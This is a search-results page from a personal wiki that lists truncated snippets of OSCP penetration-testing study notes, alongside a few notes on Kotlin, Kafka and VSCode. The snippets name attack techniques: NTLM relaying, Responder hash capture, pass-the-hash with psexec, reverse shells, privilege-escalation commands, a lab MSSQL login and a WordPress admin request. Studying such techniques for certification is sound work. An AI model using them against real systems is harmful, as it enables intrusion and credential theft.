跳到主內容
進階搜尋
搜尋字串
內容類型

精確符合
標籤搜尋
日期選項
在此之後更新
在此之前更新
在此之後建立
在此之前建立

搜尋結果

找到了 567 個結果

【extention】Preettier

【Treeman】總覽 VSCode

 

【Kotlin】集合 Iterable/Collection/List/Set/Map

【Treeman】Java相關 Kotlin

出處 : https://blog.csdn.net/vitaviva/article/details/107587134 建立集合  不可變更集合 immutable import ...

【總覽】Tools

【Treeman】OSCP

常用網站 提權 g0tmi1k(Linux 提權) gtgobins (提權查詢) echo 'exec "/bin/bash"' > app.rb 編碼 CyberCh...

【Linux】【列舉】常用命令

【Treeman】OSCP 【OSCP】課程筆記

# 尋找當前用戶可寫目錄 oe@debian-privesc:~$ find / -writable -type d 2>/dev/null .. /home/joe /home/joe...

kafka connect

【Treeman】總覽 Kafka

  架設Kafka與Kafka Connect讓訊息自動同步至MongoDB connect 說明 https://docs.confluent.io/platform/current/c...

【shell】【impacket】ntlmrelayx

【Treeman】OSCP 【OSCP】Tools

  # --no-http-server來停用HTTP伺服器,因為我們正在中繼SMB連接 # -smb2support添加對SMB2.3的支援。 # -t將目標設定為FILES02。 #...

【SMB】【Net-NTLMv2雜湊監聽】Responder

【Treeman】OSCP 【OSCP】Tools

  現在讓我們進行這個過程。首先,我們需要運行ip a以檢索所有接口的列表。然後,我們將以sudo運行Responder(在Kali上已經預安裝),以啟用處理各種協議的特權原始套接字操作所需的...

【terminal】【impacket】psexec

【Treeman】OSCP 【OSCP】Tools

要執行 psexec,我們可以輸入 impacket-psexec 並帶有兩個參數。第一個參數是 -hashes,它允許我們使用 NTLM 雜湊來對目標進行身份驗證。格式為 "LMHash:NT...

【密碼】【破解】hashcat

【Treeman】OSCP 【OSCP】Tools

https://hashcat.net/hashcat/ hashCode 範例 https://hashcat.net/wiki/doku.php?id=example_hashes # ...

【反向 shell】

【Treeman】OSCP 【OSCP】課程筆記

https://gchq.github.io/CyberChef https://www.online-python.com/ Online - Reverse Shell Generato...

【Linux】【列舉】linpeas

【Treeman】OSCP 【OSCP】Tools

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS `linpeas.sh` 是一個用於 Linux 系統的自動化信息搜集工...

【SQL_injection】github

【Treeman】OSCP 【OSCP】Tools

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Inje...

【sql】impacket-mssqlclient

【Treeman】OSCP 【OSCP】Tools

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth

【php】php攻擊手法

【Treeman】OSCP 【OSCP】課程筆記

php 漏洞網頁 index.php <a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a...

常用目錄/檔案

【Treeman】OSCP 【OSCP】課程筆記

除了 rwx 文件權限外,還有兩個與可執行文件相關的額外特殊權利:setuid 和 setgid。這些用字母 "s" 來表示。 如果這兩個權限被設置,權限中將出現大寫或小寫的 "s"。這允許當...

【web】【linux】【shell】curl

【Treeman】OSCP 【OSCP】Tools

  curl #`--path-as-is` 是在使用 cURL 命令時的一個特殊參數, # 它指示 cURL 將 URL 中的路徑部分視為原樣處理,而不進行百分比編碼(Percent-E...

【terminal】php-reverse-shell

【Treeman】OSCP 【OSCP】Tools

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php <?php // p...

【online】【編碼】jscompress.com

【Treeman】OSCP 【OSCP】Tools

https://jscompress.com/ var ajaxRequest = new XMLHttpRequest(); var requestURL = "/wp-admin/use...

【web】【爆破】burpsuite

【Treeman】OSCP 【OSCP】Tools

#啟動 kali@kali:~$ burpsuite https://bookstack.treemanou.com/books/treemanoscp/page/ch8-introduct...

【列舉】【提權】【Linux】unix-privesc-check

【Treeman】OSCP 【OSCP】Tools

/usr/bin/unix-privesc-check kali@kali:~$ unix-privesc-check unix-privesc-check v1.4 ( http://pe...